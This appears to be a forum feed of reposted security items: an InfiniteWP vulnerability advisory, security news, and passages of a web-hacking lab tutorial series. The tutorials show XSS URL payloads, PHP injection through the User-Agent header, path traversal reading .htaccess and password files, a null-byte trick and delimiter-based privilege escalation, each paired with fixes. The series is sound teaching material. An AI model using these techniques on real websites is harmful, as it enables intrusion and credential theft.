$DBEscapeString is set to false by default. This allows for SQL injection. ----- Issue 3: uploadScript.php unrestricted file upload vulnerability Vulnerable: InfiniteWP Admin Panel <= 2.4.3 Unauthenticated users can upload various file types to the uploads directory, including .php files, if query parameter allWPFiles is set. File names however are suffixed with the .swp extension when written to the file system. If the following two conditions hold, this leads to PHP injection: 1. The uploads directory must be writable by the webserver. 2. The webserver must interpret *.php.swp files as PHP code, which happens when Apache is used with configuration 'AddHandler application/x-httpd-php .php' or 'AddType application/x-httpd-php .php' (This is discouraged by PHP, but older distributions and some shared hosts use it) ----- Issue 4: Insecure password storage Vulnerable: All versions including current (2.4.4) Passwords are stored as unsalted SHA1 hashes in iwp_users.password. These passwords can easily be cracked. Cracking a password allows a successful attacker to keep their access to the admin panel even after security updates are applied. ----- Recommendations We recommend that users of InfiniteWP take the following actions: 1. Upgrade InfiniteWP Admin Panel to version 2.4.4. 2. Check the uploads directory for the presence of any unauthorized file uploads. 3. Change admin passwords for the InfiniteWP Admin Panel and any Wordpress sites in the panel. Use long and unique passwords. 4. Remove and re-add Wordpress sites to the InfiniteWP Admin Panel, in order to generate new secret keys. 5. Strongly consider limiting access to the InfiniteWP Admin Panel, especially if you do not require customer access to the panel. For instance, use a .htaccess file to add authentication and limit IP addresses. If possible, protect the panel with a web application firewall (WAF) such as ModSecurity. ----- Timeline - 26 Nov: Vulnerabilities and patches submitted to InfiniteWP - 27 Nov: InfiniteWP publishes version 2.4.3 with fix for issue 1 - 4 Dec: Incomplete fix reported to InfiniteWP - 9 Dec: InfiniteWP publishes version 2.4.4 with fix for issues 2-3 - 10 Dec: Vulnerabilities published ----- Credits The vulnerabilities were found by Walter Hop, Slik BV (http://www.slik.eu/), The Netherlands. -- Walter Hop | PGP key: https://lifeforms.nl/pgp Source
  15. Pe ce pune mana Dorel se alege prafu' Doamne dar si aia ba sa fie asa de prosti?
  16. http://www.digi24.ro/embed/Stiri/Digi24/Extern/Stiri/Tortura+CIA+dezvaluita+in+Senatul+american?video Chiar în aceste momente este prezentat în Senatul american un document de 500 de pagini care descrie tehnicile de interogare ale CIA. Senatorii acuz? agen?ii c? au folosit metode extrem de brutale ?i de multe ori lipsite de efect, în cazul suspec?ilor de terorism. Încalc? valorile pe care le promoveaz? America, a tras concluzia Barack Obama. Mai mult, programul de interogatorii nu a fost supervizat de Congres, a?a cum ar fi fost normal, iar agen?ii CIA au furnizat infoma?ii false sau trunchiate Congresului ?i Casei Albe despre intensitatea ?i brutalitatea tehnicilor de interogare folosite. Senatorii spun c? Agen?ia nu a comunicat adev?ratul num?r al prizonierilor supu?i interogatoriilor brutale. Totul, în condi?iile în care cel pu?in 26 dintre de?inu?ii supu?i acestor introgatorii, nici nu ar fi trebuit s? ajung? în deten?ie. În fine, CIA este acuzat? de raportul întocmit de senatorii democra?i, c? ar fi furnizat ilegal informa?ii din dosarele sale c?tre anumi?i jurnali?ti, pentru a induce ideea c? interogatoriile precum cele de la Guantanamo ar fi avut succes, iar serviciile americane de contraspionaj ar fi ob?inut informa?ii esen?iale în lupta pentru combaterea terorismului. Source
  17. Fratilor omul poate nu stie hai sa nu o dam in trolling... @Stefanae ebay este un site renumit si da il recomand eu mi-am cumparat diferite produse de-a lungul timpului si sunt multumit. Acum depinde si de produs poate gasesti pe site-urile din romania acelasi produs intr-o stare identica si cu un pret egal sau mai mic fata de ebay.
  18. A white-hat hacker who was able to take 255 BTC from Blockchain wallets following a security flaw earlier this week claims to have returned the funds. Bitcoin Talk member 'johoe', an account 1.5 years old but with only 21 posts, had always stated that he or she was taking the funds for safekeeping and would return them, writing on the forum: Johoe then posted a page of 1,019 addresses said to be compromised, and invited users to check if theirs was one of them. Even before the funds were returned, Blockchain had admitted it was at fault and promised to reimburse any users who had lost money. Random number flaw The problem that led to the vulnerability was reportedly wallets generated with previously used 'R-values' in formulas that generate random numbers, meaning a hacker could use the public address to calculate its private keys. If R-values are unique, this should be impossible. For the technically-inclined, Blockchain CTO Ben Reeves has pointed out the mistake in code on Blockchain's GitHub page here. Blockchain posted in a statement that the issue affected web wallet users who had created a new wallet address or sent funds from an existing address during the period the vulnerability was live. According to johoe, Reeves sent an email asking him to send the funds to this address, which johoe duly did, posting a photo of a Trezor wallet sending the transaction. Still solving the problem Customers on Bitcoin Talk and Reddit, while relieved their funds were swept by someone with good intentions, are now attempting to contact Blockchain to prove their losses and have them returned. At this stage, however, it is not 100% confirmed that all funds removed from Blockchain wallets were under johoe's control. At least one user has claimed that nearly 100 BTC missing from his wallet have gone elsewhere. CoinDesk reached out to both johoe and Blockchain for comment but had not received a response at press time. Source
  19. Chinese internet users are behind 85 per cent of fake websites, according to a semi-annual report [PDF] from the Anti-Phishing Working Group (APWG). Of the 22,679 malicious domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domain out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may because of the higher average price of new gTLDs, although they expect the new of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers. For much more information, check out the report itself [PDF]. Source
  20. Introduction In Part IV of the Website Hacking series, we are going to look at: Storing your email address and telephone number in <a href=mailto:*> and <a href=”tel:*> and the inherent drawbacks of these methods Shortcomings of disguising email in markup to avoid spam and other malicious requests (disguise such as mail [at] mail [dot] com) Pitfalls of CDNs (Content Delivery Networks) A widely used code snippet that is subject to XSS attacks Relying on the HTML markup for important data for the application (such as product prices) A loose security mechanism in an Australian governmental website. Avoid giving sensitive information in a plainly visible way in the HTML markup We all know of the <a href=mailto:sample@sample.com>Mail Me!</a>. However, giving out your email like this makes it pretty easy for bots to filter out your email and place it in a database/file, whatever they desire, making you subject to spam and other malicious attacks. To illustrate, I have created a sample script that gets all results for “mailto:” and <a href=”tel: xxx-xxx-xxxx”> from https://meanpath.com/ and stores it in a file or displays it to the browser. This script is just a sample and assumes that all results are on a single page. Furthermore, MeanPath shows only 100 rows from the results unless you pay to get all of them. Regular expressions are used to filter only those results that contain valid email addresses shown directly in the anchor tag. And for the telephone mining, it just gets the phones that are in the xxx-xxx-xxxx format. The code also ensures that no duplicate emails/telephones are entered into the list of the data. Figure 1: A view of some of the collected emails and telephone numbers. A better way to mine such data would be through Search Engine for Source Code - For HTML, JavaScript and CSS | NerdyData. Figure 2: First part of the code. It creates a MeanPath class with a function called mine_elements() which gets all results from MeanPath and stores it in an array. The other function filter_elements() filters only the elements that match the query that was given in the instantiation of the MeanPath object and also makes sure there are no duplicate entries. Figure 3: Second part of the code. The function display_data() shows the data in a ordered list in the browser. The function save_data_to_file() saves it on a random file, given when calling the function. Lastly, the MeanPath class is instantiated and data saved to a file and displayed in the browser. Thus, it should be evident by now that giving personal information should involve some safeguards. Of course, this is not always necessary. I also have to say that “encoding” the email in a format such as “sample [at] sample [dot] com” or “sample [at] sample . com” does not make it any more secure. Here we have a short snippet of code. There is an HTML paragraph with an email given in it in that format and a PHP code that gets the file and extracts the email with a silly regular expression that extracts it and saves it into an array. The regular expression checks for any number of characters followed by [at] or @, followed by any number of characters after which there are some of the top-level domains. Here is the browser result of the search: array(5) { [0]=> string(44) " Contact me at stereo [at] room [dot] com" [1]=> string(25) " Contact me at stereo " [2]=> string(4) "[at]" [3]=> string(12) " room [dot] " [4]=> string(3) "com" } matches[0] is the full expression that matched our search, matches[1] is the first parenthesized part of it that matched, and matches[2] is the second parenthesized part of the regex, and so on. Use CDNs but be aware of security implications CDNs (Content Delivery Networks) are a great way to decrease page load time (both because they often provide the script in numerous countries and load the one that’s closer to the user) and because users may have already cached the script by visiting another site which uses that particular CDN. However, there are security risks in that you have no control over what is stored in the loaded file. If the CDN gets compromised, the code in the file you are loading may change, and that can lead to more than just cookies being stolen. Also, the script loaded from the CDN can become unavailable, temporarily or not, leading to a frustrating user experience. If the file was on your domain and your site went down, the users would know there is a problem with the site, however if a CDN file such as jQuery gets unavailable and you are relying on it heavily – they would not know what is happening – the site would be up but it would look completely out of whack. First off, the attacker can change the source code of the delivered script, and: Replace your design with whatever he wants. Also, the attacker can execute JavaScript snippets if the user is using IE or Firefox (considering it is a .css file). Replace the code to frustrate users, redirect your site to another one, steal users’ cookies and load any kind of exploit code he wants. Gain server-side control if the delivered file is a JavaScript file. Figure 4: Executing arbitrary JavaScript within CSS Expression() works for some modes of IE8 and the ones below IE8 (particularly IE7 and IE5) which are still used nowadays. We see a very simple HTML 4.01 page which sets a cookie on each visit to the page without checking if it exists when the page loads. After that we have a <style> tag in which we pick a selector and a property and add expression(code here) to it where arbitrary JavaScript code can go inside. For example, you are loading a .css file via CDN (let’s say a CSS reset) this could be a potential security risk. Figure 5: Here is how the page looks in Internet Explorer 7.0 on Windows XP (Emulated from browserstack). As we can see, the expression ‘do’ gets evaluated and the cookie shown. We can do much more than this, but we will leave that to your imagination. Figure 6: The same page in a contemporary browser (latest version of Chrome) Another thing that can be done with control over the CSS is the following: Figure 8: Using a CSS CDN – possibilities Now, not only does a probable CDN have the ability to remove all of your content from being displayed to users, but it can add custom text to it, possibly acting as a fake redirect message and scaring/confusing your users enough to make them never come back to your site. Only two CSS selectors are necessary to make such a change to your page, and the code does not assume any level of knowledge of the HTML markup in the page: As for using CDNs for JavaScript files, I hope you do not think that it is only possible to steal the JavaScript cookies and mess around with the DOM when the external file is compromised. It takes 2-3 lines of code to load any server-side file via AJAX. To simulate a JavaScript file loaded from a CDN, we added a local .js file to the recipes page I’ve shown earlier. Then in the file we executed the following: And in the PHP script we had this: This worked as the picture below shows: Now the attacker has much more power over both the server and the website. You can see one of the previous articles of the series that concerned PHP Injection and learn some of the things that can be achieved from now on. XSS is everywhere Another thing to be on the lookout for is XSS. It comes in many forms, but here we will give one example that is sometimes unknown for developers. In PHP $_SERVER['PHP_SELF'] is vulnerable to cross-site scripting. Often, it is used as part of a <form> action attribute. It should always be escaped with something like <form method=”GET” action=”<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>”>. Figure 9: An example of a page vulnerable to XSS. Do not pay attention to the poor nesting. What the <form> action does is just echo the URL that the user is currently in. This means that he can easily manipulate the URL to include code and the browser will execute it. He can also give links with manipulated URLs of the site to third-users and get something from them. All he has to do is close the action attribute and close the <form> tag. Thus, he has to type “> and insert HTML code after that in the address bar. Figure 10: XSS example Above we see a JavaScript snippet executed in the address bar which alerts “Hi” (localhost:8079/4/php_self.php/”> <script> alert(“Hi”);</script>). Google Chrome would break requests like this, but Firefox does not do it that well. Setting important data for an application in the markup To illustrate, I have taken some screenshots from a search in nerdydata.com for the keyword data-price=” Setting important data for an application in the markup Figure 11: data-price=”$269.99?. It could be generated dynamically just to show the price with JavaScript. Figure 12: data-price”75? and a data-tid=”51127? (the ID of the product is also set in the HTML markup) Figure 13: close to 14,000 websites with price set in the HTML markup. At least a couple of them will be vulnerable to user manipulation of the price. I do not think that I am wrong by saying that at least a couple of sites from those 14,000 will not have proper mechanism set up on the server side to check for the product’s price by checking the product ID or name and getting the prices from a database. I also want to show this way of storing the price: Figure 14: <input type=”hidden” name=”price” value=”59?>, <input type=”hidden” name=”item_id” value=”…”> Figure 15: 7087 websites with hidden input containing the price of the product. Mo’ Captcha, Please Figure 16: Site of Australian government… In the picture we see a page from the site of the Australian Customs and Border Protection Service which does not have any of the fancy CAPTCHAs (I agree that they may prevent also legitimate users from using the site, but it is more positive than negative). The security mechanism in the abovementioned site seems static; the bold numbers do not change. In case they changed: I have created a snippet which fetches the numbers, considering they weren’t static, and this was their security verification method – showing and making you type different numbers in bold text next to other characters, all of which are fully visible in the HTML markup. Figure 17: This snippet fetches the page from their site and displays it in an unseen div so I can traverse the data with jQuery. The jQuery code then loops for each <strong> tag and adds its text to a variable, separating different strong tags by whitespace on both sides. Then a regex is called, which matches only numbers followed by whitespace on both sides and converts the resulting array to a string. Finally, all whitespace is removed from the mined numbers and their values are shown in the console and in an alert. Conclusion I hope those tips have helped you, whether a lot or a little, to see common mistakes and possibilities for mistakes in web applications. If you want to have all the source code, you can download all the files with PHP, HTML, CSS, JavaScript and JQuery code used in the article from this page. Source
  21. Introduction In this part of the Website Hacking 101 series, we are going to discuss controlling access to directories (if access is not controlled by key directories like include/includes, the system can be accessed simply by guessing the URL), direct static injection (A Direct Static Code Injection attack consists of injecting code directly onto the resource used by application while processing a user request), file inclusion vulnerability (especially when dealing with files from external servers) and database security (quick guide). Exercise 9: Controlling Access It is always good practice to control access to your assets. There are directories and files that you do not want to be accessed by ordinary users. For instance, most apps have a system or include/includes directory. If the script in the includes directory is not written well enough to handle access outside the usual include statement, it might trigger some errors which would reveal information to possible attackers. For example, errors can reveal your hosting account which could lead to brute-force/dictionary attacks on your hosting account (that is just one simple example). Also, if a user opens a file with an extension .inc instead of .php – the code will not execute and will be printed as is. All files that do not contain server-side code or are not named properly will also be readily available for examination. Figure 1: Unprotected includes directory. All assets are revealed. The attacker can then test all the different assets for errors and start gathering information about additional vulnerabilities. Figure 2: Some of the includes do trigger errors As we mentioned before, a possible solution is to set display_errors to Off in the php.ini file or to use ini_set (‘display_errors’, ‘off’) in the code of a particular script. However, it is a better alternative to deny access to everyone but the server to this directory. In that way, your pages which include or require files from that directory can still access them but requests from a visitor (the client) would trigger an error. You simply create an .htaccess file in the forbidden-to-be directory and insert: order allow,deny allow from 127.0.0.1 deny from all where 127.0.0.1 can be used for localhost. You can also insert directly a domain name or your server’s IP address. There are myriad websites that show the IP address of the server, should you be in doubt about it. IMPORTANT: If you enable access to directories/files only from the server, you will be able to access them with functions such as include, require, fopen and file_get_contents, but users would not be able to access the files if the link was provided as an href attribute to an <a> tag or if the request for the file is made via an ajax call, since such requests also come from the client and not from the server itself. Thus, use this method only for directories/files that are not normally requested by the client. Alternatively, you can deny offending parties (such as spammers) access to your app by getting the $_SERVER['REMOTE_ADDR'], $_SERVER['HTTP_X_FORWARDED_FOR'] or $_SERVER['HTTP_CLIENT_IP'] (one of the last 2 values may be set if the client is using a proxy) array elements and writing the offending IP to the .htaccess file along with a ‘deny from’ directive. Exercise 10: Direct Static Injection (Your visits) Let’s say that we have an app that logs data about each visit of its users. The data can include the user’s IP, browser & OS and date and time of the visit. This data can then be shown to the user so he can check for illegal logins or it can be processed by some script to check for abnormal user behavior. Such an app can be vulnerable to direct static injection, because the gathered data can be tampered with by the user to include code which will execute itself when the user visits his log. Figure 3: How a user log may look. In this sample, the user clicks on the button, types his name and sees all data about that name. There is no session/cookie/authentication. From the data in the log, we can determine that $_SERVER["HTTP_USER_AGENT"] is used to gather information about the user’s browser & OS. Thus, we can easily start Tamper Data and change the User-Agent to include a piece of code that we want to try to execute and if the data is not properly sanitized – it will work. Figure 4: Changing the User-Agent Header The first time I changed it to <?php echo “I EXECUTED PHP SCRIPT “” ?> and I saw that it worked, so now I know that I can execute arbitrary code in the webpage. For example, here is what I get if I change the user-agent to <?php phpinfo(); ?> You can basically ruin this website. That is why our next exercises will touch on input sanitation. Exercise 11: File inclusion vulnerability There are times when you are required to load files from external servers. Sometimes the PHP code inside these pages has to be executed as well. If you want to use include() or require() you would need to set allow_url_include to ‘on’ in the php.ini file. It is not possible to turn it on using ini_set(‘allow_url_include’, ‘on’) inside the script. However, you can always create your own custom php.ini file and enable them there should you be using shared hosting (See Appendix 1 to see how to create custom php.ini in shared hosting). Furthermore, to turn on allow_url_include, allow_url_fopen has to be turned on. If the file that you want to get is not expected to contain php code, you can use file_get_contents to get its contents. If you want to use that function and still execute php code, you should evaluate the contents after loading them – eval(). In the example website, we have used the following method to load any file. $contents = file_get_contents($file . ".php"); echo eval("?> $contents"); If your website requires, it is a good idea to rely on whitelisting to filter out bad files. /* Avoiding path traversal and use of whitelisting. Only files that are in the $files array can be loaded to to the page. External files that are in the array would also be loaded successfully */ $file = $_GET['file']; $file = str_replace(array(".", "/"), "", $file); $files = ["calculator", "files", "visits", "mysql"]; if (in_array($file, $files)) { $contents = file_get_contents($file . ".php"); echo eval("?> $contents"); } else echo "<h3 style='text-align: center; color:#fff'>Bad file chosen.</h3>"; If we did not employ the whitelisting, the following and many more things could happen: Figure 5: The attacker can get the user’s cookies The attacker can give a URL to the website’s URL on which his own external script is loaded to a third user that uses the website to get the user’s cookies. He can even save them on a .txt file in the server which he can easily access to check for newly gathered cookies. Figure 6: The attacker can execute external programs/commands on the server Figure 7: The attacker can see/delete your entire app Basically, he can do whatever he wants, depending on your settings, should you make such a mistake. Exercise 12: Database Security When the example is opened, it creates a db with a table of 2 products. Then, you can perform an insecure search for product by this ID and a more secure one. You will have to insert your MySQL user credentials in includes/conn.php to run this example. Firstly, it should be noted that input sanitation would not remove second level SQL injections. That is why you can also employ whitelisting to allow the user to enter only the type of characters that are necessary for the functionality to work. The insecure search is made with the original mysql() API which is deprecated and should not be used in new projects. The more secure one is made with the PDO object. NOTE: PDO or mysqli should be used for handling MySQL. PDO can handle connections with all kinds of database servers – not just MySQL. It is more secure than the old mysql() API When using PDO you do not have to escape inputs with a function such as mysql_real_escape_string($string) but for the input to be properly escaped you would have to use prepare and execute statements instead of the direct $pdo_object->query($query_string). $query = $db->prepare("SELECT * FROM Products WHERE product_id = ?"); $query->execute(array($id)); Here is how a query might look like with prepare and execute methods applied. Secondly, we know that the user is supposed to enter a number (ID of the product) so we can use regex to filter the input and leave only the numbers from the input string which would prevent the input from becoming a second level sql injection (because the user would be able to store only digits on the database should the input be stored there). $id = $_POST['id']; $id = preg_replace("/[^0-9]/", "", $id); Here is how the whole query might look: require_once("conn.php"); if (isset($_POST['id'])) { $id = $_POST['id']; $id = preg_replace("/[^0-9]/", "", $id); $query = $db->prepare("SELECT * FROM Products WHERE product_id = ?"); $query->execute(array($id)); if (isset($id) AND $id !== "") { showData($query); } else { echo "<p>Bad query!</p>"; } And here is how the showData function looks. It can be reused each time some filter is applied to the database search queries. function showData($query) { if ($query->rowCount() > 0) { foreach($query as $row) { echo "<div class='product'>"; echo "<h3>Product: {$row['product_name']} </h3>"; echo "<h3>ID: $row[product_id] </h3>"; echo "<h3>Price: $$row[product_price] </h3>"; echo "<h3>Image: <img src='$row[product_img]' alt='$row[product_name]'</h3>"; echo "</div>"; } } else echo "<p>No products found!</p>"; } Connecting to a database with PDO looks like this: $db = new PDO("mysql:host=$host;dbname=$dbname;charset=utf8", "$root", "$root_password") where dbname may be omitted and mysql can be replaced with a different database. It is handy to do some checks before the request comes to the back-end of the app to decrease unnecessary load on server, provide better interface to the user (where he won’t have to wait for the server-side script to execute if he merely mistypes something, he can be shown directions as to what is wrong with his input, etc.) but you should always be aware that client-side validation can easily be circumvented. The search by ID can be set to be validated by the HTML5 built-in validation mechanism. However, for the validation to take place, the input-collecting tags must be within a <form> tag and the validation takes place when the user clicks the <input type=”submit”> button. <form action="" method="POST"> <h3> MORE SECURE</h3> <label for="db_byid">Find A Product by its ID</label><input name="id" type="number" max="500" maxlength="3" size="3"> <input type="submit" value="Find"> </form> Here is how the HTML5 validation may be used with our “Search by product id”. Here, the client will check whether the input is a number, lower than 500 and containing only 3 digits on ‘submit’. Alternatively, you can do your own validation on submit with js: var idGiven = $("#db_byid").val().trim().replace(/[^0-9]/g, ""); PHP Injection can easily occur when using eval() so be careful when allowing user input to run through eval(). Conclusion We are barely touching upon the vulnerabilities involved with web apps, but one has to be aware that the responsibility of security lies, to a large extent, in the developer’s hands and it is not an issue that has to be tackled by security experts only. The next part of the series is going to be more practically oriented. Appendix 1 Create the php.ini file in you root directory (home/username). Do not upload it in public_html or www as this will make the file publicly accessible. Create an .htaccess file in the same place and add the line SetEnv PHPRC /home/yourusernamehere/php.ini. And it’s done… You can add the code below to the .htaccess to further protect the file. <FilesMatch ".*.(ini)$"> order allow,deny deny from all </FilesMatch> NOTE: This will match all .ini files. Source
  22. Introduction To view Part I of this article, please visit Website Hacking 101 - InfoSec Institute. In this Part, we are going to briefly introduce Path Traversal, usage of Delimiters, and Information Disclosure attack. We are going to present simple solutions to simplified problems involving the attacks. Content Exercise 8: Path Traversal Figure : A simple webpage in which you choose an article and view it The website (index.php) in the PathTraversal folder contains a simple form which submits to the same page through the GET request method. Once a choice of article has been made and “View article” has been clicked, the following PHP code executes: <?php //If the article GET parameter is set if (isset($_GET["article"])) { // Create a div block and fill it with the contents from the file in the GET value. echo "<div id='article'>" . file_get_contents($_GET["article"]) . "</div>"; } ?> The result is the following URL: http://localhost/2/PathTraversal/?article=1.htm It loads the relevant article file placed in the GET method. The parameter article is formed via: <select name="article" required=""></select> And the values are also directly given through the HTML code (the value attribute): Domain Slamming Now, legitimate users will use the interface provided in the website to browse it, but with the code as it is we can easily open myriad files they do not want you to open by directly tampering with the URL parameters. Many websites have config directories where they store important data – let’s see if you can do it. Tasks Go back one directory and open openme.txt by changing the URL parameters. We assume that we cannot open the folder config from our computer but only from the local server. Assume you do not know what files there are in the directory. First, you should check whether the directory exists. The directory exists and now we know that there is HTTPAuth in place. Your task is to somehow find out the username and the hashed password for the folder without using any brute-force or dictionary attacks on the username and password. Spoiler (Task 2) If we know that there is a HTTPAuth security mechanism in place, then we can automatically deduce there is an .htaccess file. Therefore, we can open the .htaccess file that we would not be able to open normally via the path traversal vulnerability of the article viewer page. Figure: Viewing the .htaccess file from the article viewer page We type http://localhost/2/PathTraversal/?article=config/.htaccess and now we know the path and the file in which accounts and passwords are stored as well as the user that is required to view the folder. We type the path to the userlist.htpasswd file and get all usernames and passwords: tomburrows:$apr1$ZF.78h2N$zhAaP2AY6VwxuELizJAwg. Now, the username is known and we have incredibly reduced our cracking time. HTTPAuth is using UNIX’s “CRYPT” function to encrypt the passwords which is a “one way” encryption method. Using path traversal, we can also go back several directories and browse to the php.ini and other important configuration files as well. A sample solution to our path traversal vulnerability <?php //If the article GET parameter is set if (isset($_GET["article"])) { //Remove any “/” and “.” characters from the GET parameter’s value as this can be used for path traversal $article = str_replace(array("/", "."), "", $_GET["article"]); // If the file does not exist, print a custom error. if (!file_exists($article . ".htm")) { echo "<h1>The article does not exist!</h1>"; } else { //If and only if the file exists – echo out its contents // Create a div block and fill it with the contents from the file in the GET value. //Add a mandatory file extension of .htm to the file echo "<div id='article'>" . file_get_contents($article . ".htm") . "</div>"; } } The change in the HTML code is that we no longer use the full file name value in the options tags, we just use the name of the file (without its extension so only .htm files would be allowed) <a title="Keyloggers: How They Work and More" href="http://resources.infosecinstitute.com/keyloggers-how-they-work-and-more/">Keyloggers: How They Work and More</a> Firstly, checking if the file exists and echoing it out only if it exists prevents another attack – that of information disclosure. There is a PHP warning thrown out if we type a non-existent file deliberately. Of course, another way to resolve such information disclosure issues is by turning off the display_errors In the php.ini file (this is most desirable if the site is live anyway). With the above mentioned code we get a clean and neat error that the article does not exist, along with prevention of any path traversal attempts. Figure: We now receive an error when we try to go back one directory and open the openme.txt file Note: in old editions of PHP (older than 5.5.3) you could use the %00 marker to end the string abruptly and pass your own file extension in place of the “.htm” one in our solution code. if (!file_exists($article . “.htm”)) could be exploited in older versions of PHP by typing: http://localhost/2/PathTraversal/?article=accounts.txt %00 Which is equivalent to: “accounts.txt.htm” forcing the server to ignore the .htm part of the string. Exercise 9: Information disclosure Figure: Comment page For this exercise, I have created a working but problematic comments page which looks similar to a chat. You have to write a comment, and then you view all the comments up to now. The comments are stored in a .txt file rather than in a database and there is one PHP file that creates new comments and one that displays them on the screen. //Index.php server-side code <?php $path = "comments/"; ?> <?php if ($_SERVER["REQUEST_METHOD"] === "POST") { include("add_comment.php"); } //Add_comment.php <?php //Open file and create an array with all comment information as indices $comments = file_get_contents($path . "comments.txt"); $newcomment = []; $newcomment[] = $_POST["name"]; $newcomment[] = $_POST["topic"]; $newcomment[] = $_POST["message"]; // Convert to string and add a delimiter to store in file $newcomment = implode(":", $newcomment); // Write the string to the file $comments_w = fopen($path . "comments.txt", 'w'); fwrite($comments_w, $comments . "n" . $newcomment . ":" ); // Show all comments include($path . "view_comments.php"); ?> Figure: How the comments file looks // View_comments.php <?php //Convert to array and echo all out in a certain format within the comments div $comments = explode(":", file_get_contents($path . "comments.txt")); echo "<div id='comments'>"; for ($i = 0; $i < count($comments) - 1; $i += 3) { echo "<p>User: " . $comments[$i] . "<br> posted about: ". $comments[$i + 1] . "<br> and he wrote: " . $comments[$i + 2]; echo " </p>"; } echo "</div>"; ?> This application works just fine when viewed as is, but imagine if a user enters add_comment.php separately, without the file being included from the index.php. This can easily happen as the name of the service implies the file name, and this particular file name is frequently used, and the fact that add_comment.php is in the same directory facilitates the process. Figure: Viewing add_comment.php on its own Now, the attacker would know that we have a variable called $path and he can probably guess that we are setting the path to the comments file as there is a warning that file_get_contents(comments.txt) cannot be opened. Thus, he knows the name of the file that contains all our comments as well. Because the include is failing, he also knows the whole include_path which can also be dangerous. Also, the attacker knows another file in our directory tree (view_comments.php) so he can access it and look for some more errors. He also knows that in this file we are working with the POST values from the form, as he can view the HTML and see they are the same. This comments form is also vulnerable to diferent code injection attacks. You can easily insert in one of the comment fields to test it out. In that way, the browsers of the users’ will execute any code that you like each time they visit the page. A probable solution is easy: wrapping the post values in htmlspecialchars() function which converts < and > amongst others as special characters (<, >, etc.) preventing them from being interpreted as code. $newcomment[] = htmlspecialchars($_POST["name"]); $newcomment[] = htmlspecialchars($_POST["topic"]); $newcomment[] = htmlspecialchars($_POST["message"]); Solution A simple solution to get rid of all those errors in this example is to wrap the code in add_comment.php and view_comments.php inside the following if statement: if (isset($path)) { //code here } In that way, the code will only execute if the files are included from index.php, presumably. Of course, that does not handle the issue that users can post the form empty and still view the content and make the application think there is an actual comment, but that can easily be fixed and is not the issue of discussion here. Displaying errors is good for development purposes but when the application is live and in production – always turn off display_errors from the php.ini Exercise 10: Delimiters We will be looking at a vulnerability similar to the one that existed in the old Poster website. Sometimes, parameters used In the code can be abused by users even when interacting with the interface provided to them. Open Delimiters folder from your localhost in a browser. There is a users.txt file which contains all the user data. However, access to it is forbidden from the .htaccess file: <Files "users.txt"> Deny from all </Files> Try to open it using the path traversal method of the article viewer, just for practice. Look at the different data stored there and think about what everything represents. Try to login with one of the accounts and escalate your privileges to “admin” just by communicating with the website as normal. Spoiler http://localhost/2/PathTraversal/?article=../Delimiters/users.txt //The path in the GET should be valid, but you should fill the path to the index.php. It should be clear that the “:” character is the delimiter between the different values. You can test on the login form, but it should be clear that the first word before the first delimiter is the username, the second is the password and the third is the user’s privileges. The code that extracts the user data one line at a time is the following: $userlist = fopen('users.txt', 'r'); while (!feof($userlist)) { $line = fgets($userlist); $acc_details = explode(":", $line); $username = $acc_details[0]; $password = $acc_details[1]; $access = $acc_details[2]; Then, each line is checked separately with the submitted details to check whether It matches with them: if ($username === $_POST["name"] && $password === $_POST["pass"]) { When it find a match, the user can be logged in. Note that there are many better alternatives than this nowadays, such as using a database and cookies. When logged in, you have the option to change your username or/and password. if (isset($_POST["pass"]) && trim($_POST['pass']) !== "") { $userlist = str_replace /* old pass */ ($_POST["userdata-pass"], */ new pass */$_POST['pass'], $userlist); echo "<em>Password changed to: " . $_POST['pass'] . "</em> "; And to check the privileges, the script merely checks if there is a substring “admin” in the $access variable. if (stripos($access, "admin") !== false) { echo "<img src="administrator.png" alt="admin" width="480" height="480" /></pre> <h1>Howdy, admin!</h1> <pre> "; } Thus, it should be clear that you can abuse this mechanism by adding the : delimiter after your password and typing admin after it when you change your password. Solution to this vulnerability The solution is easy and is the same as the previous exercise. We change the code slightly: if (isset($_POST["usrname"]) && trim($_POST['usrname']) !== "") { //We remove any delimiters in the new account details an add it to a var $newacc = trim(str_replace(":", "", $_POST["usrname"])); //Then, we replace the old password with the $newacc variable $userlist = str_replace($_POST["userdata-acc"], $newacc, $userlist); echo "<em>Username changed to: " . $_POST['usrname'] . "</em> "; } Besides sniffing and other problems, this website is again vulnerable to probability of information disclosure, as the last iteration of the while loop spills out an empty line and a PHP error would occur each time a wrong password is submitted unless display_errors is set to off. You can do the following to avoid this as well: if (trim($line) === "") break; Conclusion Sometimes the solutions to vulnerabilities are really simple and do not take too much time, you just have to split the application into pieces and test them all apart from the single whole that is the application itself. Source
  23. Introduction Websites are used daily by a large part of the world’s population to carry sensitive data from a person to an entity with online-based presence. In websites containing materials that are shown after authentication only, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact. This article is written merely with penetration testing and website security in mind. Any attempts to penetrate into live systems on your behalf and without consent may lead to criminal proceedings. To try the training files that come along with this article, you would need a local server such as XAMPP or WAMPP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you would need to install make, gcc and ssl libraries of Cygwin. Therafter, you would need to start it with the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt. Exercise 1: Deep Data Hiding In the past, and even today, some people have used security through obscurity. This means that they have unprotected directories and files with the sole protection being that they do not have any backlinks and no links to them in the main site. Thus, if one knew the URL of the directory or file – he could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed to be indexed by search engines. Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where uploaded .doc files 